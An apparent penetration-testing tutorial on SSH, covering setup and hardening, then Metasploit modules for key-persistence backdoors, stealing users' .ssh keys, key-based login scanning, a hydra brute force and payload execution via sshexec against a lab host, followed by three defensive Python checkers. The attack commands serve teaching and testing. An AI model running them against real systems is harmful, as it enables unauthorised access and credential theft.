Probing every open port is practically the first step hackers take to prepare their attack. To get work done, one has to keep ports open, but at the same time one is exposed to those hackers. Therefore, one must learn to secure ports even when they are open. In this post, we will discuss penetration testing of SSH, which is also known as Secure Shell.

## Introduction to SSH

The SSH protocol, also stated as Secure Shell, is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication, and it protects the connection and its communications with strong encryption, giving both confidentiality and integrity. It is a secure alternative to the non-protected login protocols (such as telnet and rlogin) and insecure file transfer methods (such as FTP).

## SSH Installation

It is very easy to install and configure the SSH service; we can install it directly using the openssh-server package from the Ubuntu repository. To install any service you must have a root-privileged account; then run the command given below.

```
apt install openssh-server
```

When you execute the above command it will extract the package and install the default configuration on the host machine. You can check the open port with the help of the netstat command on the host machine.

## SSH Port Scanning

If you don't have direct access to the host machine, use Nmap to remotely identify the port state, which is considered the initial step of a penetration test. Here we're going to use Kali Linux to perform the penetration testing. So, to identify an open port on a remote network, we will use an Nmap version scan that will not only identify the open port but will also perform banner grabbing, which shows the installed version of the service.

```
nmap -sV -p22 192.168.1.103
```

## Methods to Connect SSH

### Terminal Command (Linux)

Now execute the following command to access the SSH shell of the remote machine as an authorized user.

Username: ignite
Password: 123

```
ssh ignite@192.168.1.103
```

### PuTTY (Windows)

Step 1: Install putty.exe and run it, then enter the host IP address <192.168.1.103> and port <22>, and choose SSH as the connection type.

Step 2: To establish a connection between the client and the server, a PuTTY session will be generated that requires login credentials.

Username: ignite
Password: 123

## Port Redirection

By default, SSH listens on port 22, which means that if the attacker identifies that port 22 is open, he can try attacks on port 22 in order to connect with the host machine. Therefore, a system admin chooses port redirection (port mapping) by changing the default port to another one, in order to receive connection requests from the authorized network.

Follow the steps below for port redirection:

Step 1: Edit sshd_config inside /etc/ssh using an editor.

```
nano /etc/ssh/sshd_config
```

Step 2: Change port 22 to 2222 and save the file.

Step 3: Then restart ssh.

## Port Redirection Testing

Thus, when we ran the scan on port 22, it showed the port state CLOSED for ssh, whereas port 2222 is OPEN for ssh, as can be seen in the given image.

## Establish SSH connection using RSA key

Strong passwords alone are not enough to secure the server, because a brute-force attack can crack them. That's why you need an additional security method to secure the SSH server.

SSH key pairs are another necessary feature to authenticate clients to the server. A key pair consists of two long strings of characters: a public and a private key. You place the public key on the server and the private key on the client machine, and unlock the server by connecting with the private key from the client machine. Once the keys match up, the system permits you to automatically establish an SSH session without the need to type in a password.

ssh-keygen is a tool for creating new authentication key pairs for SSH.
Such key pairs are used for automating logins, single sign-on, and for authenticating hosts. Thus, we will follow these steps to generate a key pair for an authenticated connection.

Step 1: Run the given command to generate an SSH key pair (id_rsa and id_rsa.pub) on the host machine (Ubuntu).

Step 2: The same should be done on the client machine that is authorized to establish the connection with the host machine (Ubuntu).

Step 3: Once the SSH key pair (id_rsa and id_rsa.pub) has been generated, rename id_rsa.pub to authorized_keys as shown in the given image.

```
ssh-keygen
cd .ssh
ls
cat id_rsa.pub > authorized_keys
```

Step 4: Share the authorized_keys file with the host machine by copying it into the .ssh directory.

Step 5: Edit sshd_config inside /etc/ssh using an editor.

```
nano /etc/ssh/sshd_config
```

Step 6: Uncomment the PasswordAuthentication line and set it to "PasswordAuthentication no".

As a result, only the authorized machine whose RSA key is listed can establish a connection with the host machine without using a password. Now, if you try to connect to the SSH server with a username and password, the server will drop your connection request, because it only authenticates requests that present an authorized key.

Step 7: Copy the id_rsa key from Kali Linux to the Windows machine, to establish a connection using authorized keys from the Windows machine.

Step 8: Install puttygen.exe.

Step 9: Run puttygen.exe, load id_rsa and save it as a key named Key.

Step 10: Use putty.exe to connect with the host machine by entering hostname 192.168.1.103 and port 22.

Step 11: Navigate to SSH > Auth and browse to the private key that you saved in Step 9.

This will establish an SSH connection between the Windows client and the server without using a password.

## Exploit SSH with Metasploit

### SSH Key Persistence - Post Exploitation

Consider a situation where, by compromising the host machine, you have obtained a meterpreter session and want to leave a permanent backdoor that will provide a reverse connection next time. This can be achieved with the help of the Metasploit post-exploitation module "SSH Key Persistence" when port 22 is running on the host machine. This module will add an SSH key to a specified user (or all users), to allow remote login to the victim via SSH at any time.

```
use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) > exploit
```

As can be seen in the given image, it added authorized keys to /home/ignite/.ssh and stored a private key within /root/.msf4/loot. We verify this by connecting to the host machine via port 22 using the private key generated above. Here I have renamed the private key to "key" and given it permission 600.

```
chmod 600 key
ssh -i key ignite@192.168.1.103
```

It works without any trouble, and in this way we can use an SSH key as a persistent backdoor.

### Stealing the SSH key

Consider a situation where, by compromising the host machine, you have obtained a meterpreter session, port 22 is open for SSH, and you want to steal the SSH public key and authorized keys. This can be done with the help of the Metasploit post-exploitation module "Multi Gather OpenSSH PKI Credentials Collection", as discussed below. This module will collect the contents of all users' .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.

```
use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit
```

From the image given below you can see that we have got all the authorized keys stored in the /home/ignite/.ssh directory onto our local machine at /root/.msf4/loot, and can now use those keys to log in to the SSH server. This can also be done manually by downloading the keys directly from /home/ignite/.ssh, as shown in the image below. We verify this by connecting to the host machine via port 22 using the private key downloaded above. Let's change the permission of the RSA key; to do this, follow the steps given below.

```
chmod 600 key
ssh -i key ignite@192.168.1.103
```

It works without any trouble, and in this way we can use a stolen SSH key as a persistent backdoor.

### SSH login using pubkey

Considering you have the id_rsa key of the host machine and want to obtain a meterpreter session via Metasploit, this can be achieved with the help of the following module. This module will test SSH logins on a range of machines using a defined private key file and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory.

```
use auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.1.103
auxiliary(scanner/ssh/ssh_login_pubkey) > set username ignite
auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path /root/.ssh/id_rsa
auxiliary(scanner/ssh/ssh_login_pubkey) > exploit
```

This will give a command session, which can be upgraded to a meterpreter session by executing the following command.

```
sessions -u 1
```

### SSH Password cracking

We can test a brute-force attack on SSH to guess the password, or to test the lockout threshold policy, while performing penetration testing on SSH. It requires a dictionary for the username list and the password list; here we have the username dictionary "user.txt" and the password list "pass.txt" to perform the brute-force attack with the help of hydra.

```
hydra -L user.txt -P pass.txt 192.168.1.103 ssh
```

As a result, you can observe that the host machine has no defense against brute-force attacks, and we were able to obtain SSH credentials.

To protect your service against brute-force attacks you can use fail2ban, which is an IPS. Read more here to set up fail2ban IPS in the network. If you observe the image given below, you can see that this time the host machine drops the connection request when we try to launch a brute-force attack.

### SSH Public Key Login Scanner

This module will test SSH logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory. Only a single passphrase is supported, however, so it must either be shared between subject keys or only belong to a single one.

```
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.1.103
msf auxiliary(ssh_login_pubkey) > set user_file /root/user.txt
msf auxiliary(ssh_login_pubkey) > set key_path /root/.ssh/id_rsa.pub
msf auxiliary(ssh_login_pubkey) > run
```

As a result, you can observe that user "ignite" is authorized to use the public key to connect with SSH on the host machine.

### SSH User Code Execution

This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. Thus we gave the host IP along with the username and password; if everything goes right, we get a meterpreter session on our listening machine.

```
msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set rhosts 192.168.1.103
msf exploit(sshexec) > set username ignite
msf exploit(sshexec) > set password 123
msf exploit(sshexec) > set srvhost 192.168.1.107
msf exploit(sshexec) > exploit
```

As a result, you can observe that we have a meterpreter session on the host machine.

Conclusion: In this post, we discussed possible ways to secure SSH and how to perform penetration testing against such a setup.
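The Port Redirection and RSA-key steps above both come down to a few sshd_config keywords. The following Python audit is added here and is not part of the original post; it checks a config for those settings, and the expected values and the two sample configs are assumptions rather than anything taken from the post:

```python
"""Audit an sshd_config for the settings the post changes: a non-default Port,
PasswordAuthentication no and key-only login. Added example, not the post's code.
sshd uses the FIRST value it sees for each keyword (later duplicates are ignored),
so the parser keeps the first occurrence too; Match blocks are not handled."""

# Policy the audit enforces (assumed; mirrors the post's hardening steps).
EXPECTED = {
    "passwordauthentication": ("no", "password logins can be brute-forced; use keys"),
    "pubkeyauthentication": ("yes", "key-based login must stay enabled"),
    "permitrootlogin": ("no", "root should not be reachable directly over SSH"),
}
DEFAULT_PORT = "22"


def parse_sshd_config(text):
    """Return {keyword_lowercase: value}, keeping the first occurrence like sshd does."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)   # 'Key value' or 'Key=value'
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def audit_sshd_config(text):
    """Return a list of findings; an empty list means every check passed."""
    cfg = parse_sshd_config(text)
    findings = []
    if cfg.get("port", DEFAULT_PORT) == DEFAULT_PORT:
        findings.append("Port is 22 (default); the post moves it to 2222")
    for key, (wanted, why) in EXPECTED.items():
        actual = cfg.get(key)
        if actual is None or actual.lower() != wanted:
            findings.append(f"{key} is {'unset' if actual is None else actual}, expected {wanted}: {why}")
    return findings


# Constructed samples: commented-out lines leave sshd on its defaults (port 22, passwords on).
WEAK = "#Port 22\n#PasswordAuthentication yes\nPermitRootLogin yes\n"
HARDENED = (
    "Port 2222\nPubkeyAuthentication yes\nPasswordAuthentication no\n"
    "PermitRootLogin no\nPasswordAuthentication yes   # ignored: first value wins\n"
)

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_sshd_config(text) or ["all checks passed"])
```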
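The key-persistence and key-stealing modules above both leave or read entries in ~/.ssh/authorized_keys, and a defender can catch a planted key by fingerprinting every entry and comparing it with the keys that are supposed to be there. This Python check is added here, is not the post's code, and uses constructed ed25519 key bytes rather than real keys:

```python
"""Flag authorized_keys entries whose SHA256 fingerprint is not on an allowlist.
Added example, not the post's code. The sshkey_persistence module plants a public
key in ~/.ssh/authorized_keys; comparing each key's fingerprint (the value that
ssh-keygen -lf prints) with the keys an admin expects exposes that. Keys below are
constructed test values, not real keys."""
import base64
import hashlib


def ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return len(data).to_bytes(4, "big") + data


def make_ed25519_pubkey(raw32, comment):
    """Build an authorized_keys line around a 32-byte (constructed) ed25519 public key."""
    blob = ssh_string(b"ssh-ed25519") + ssh_string(raw32)
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


def fingerprint(authorized_line):
    """SHA256 fingerprint of one authorized_keys line, in ssh-keygen's SHA256:... form."""
    fields = authorized_line.split()
    # Options such as from="..." may precede the key type, so locate the type field.
    idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
    if idx is None or idx + 1 >= len(fields):
        raise ValueError(f"not an authorized_keys entry: {authorized_line!r}")
    blob = base64.b64decode(fields[idx + 1])
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def unknown_keys(authorized_keys_text, allowlist):
    """Return (fingerprint, comment) for every non-comment line not in the allowlist."""
    found = []
    for line in authorized_keys_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fp = fingerprint(line)
        if fp not in allowlist:
            found.append((fp, line.split()[-1]))   # last field: the key comment (or key data if none)
    return found


# Constructed sample: the admin's own key plus one dropped by a post-exploitation module.
ADMIN_KEY = make_ed25519_pubkey(bytes(range(32)), "ignite@ubuntu")
PLANTED_KEY = make_ed25519_pubkey(bytes(range(32, 64)), "msf-planted")
AUTHORIZED_KEYS = ADMIN_KEY + "\n" + PLANTED_KEY + "\n"
ALLOWLIST = {fingerprint(ADMIN_KEY)}

if __name__ == "__main__":
    for fp, comment in unknown_keys(AUTHORIZED_KEYS, ALLOWLIST):
        print("unexpected key:", fp, comment)
```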
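The hydra run above succeeds only because nothing counts failed logins, which is exactly what fail2ban's sshd jail does over auth.log. The following Python detector is added here and is neither fail2ban's nor the post's code; it applies the same sliding-window rule to constructed log lines, and the threshold values and log year are assumptions:

```python
"""Spot an SSH brute-force run in auth.log, the way fail2ban's sshd jail does.
Added example, not the post's code and not fail2ban itself: it counts 'Failed password'
lines per source IP and records when an IP reaches MAXRETRY failures within FINDTIME seconds."""
import re
from collections import defaultdict, deque
from datetime import datetime

MAXRETRY = 5        # failures allowed ... (fail2ban's stock default, assumed)
FINDTIME = 600      # ... within this many seconds (fail2ban's stock default, assumed)
LOG_YEAR = 2024     # syslog timestamps carry no year; assumed so they can be parsed

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2")

def parse_failed(line):
    """Return (timestamp, user, ip) for a failed-password line, or None for anything else."""
    m = FAILED.match(line)
    if not m:
        return None
    return datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S"), m["user"], m["ip"]

def brute_force_sources(lines):
    """Return {ip: timestamp at which that IP first tripped the threshold}."""
    windows = defaultdict(deque)   # ip -> timestamps of failures inside the current window
    tripped = {}
    for line in lines:
        if (parsed := parse_failed(line)) is None:
            continue
        ts, _user, ip = parsed
        win = windows[ip]
        win.append(ts)
        while (ts - win[0]).total_seconds() > FINDTIME:   # discard failures older than FINDTIME
            win.popleft()
        if len(win) >= MAXRETRY and ip not in tripped:    # record the first trip only
            tripped[ip] = ts
    return tripped

# Constructed log: 192.168.1.107 hammers the box like the hydra run; 10.0.0.5 is one typo.
SAMPLE_LOG = [
    f"Jan 10 12:00:{s:02d} ubuntu sshd[12{s:02d}]: Failed password for ignite from 192.168.1.107 port {51000 + s} ssh2"
    for s in range(6)
] + [
    "Jan 10 12:00:07 ubuntu sshd[1240]: Failed password for invalid user admin from 192.168.1.107 port 51010 ssh2",
    "Jan 10 12:03:00 ubuntu sshd[1250]: Failed password for ignite from 10.0.0.5 port 40000 ssh2",
    "Jan 10 12:03:05 ubuntu sshd[1251]: Accepted password for ignite from 10.0.0.5 port 40001 ssh2",
]

if __name__ == "__main__":
    print(brute_force_sources(SAMPLE_LOG))
```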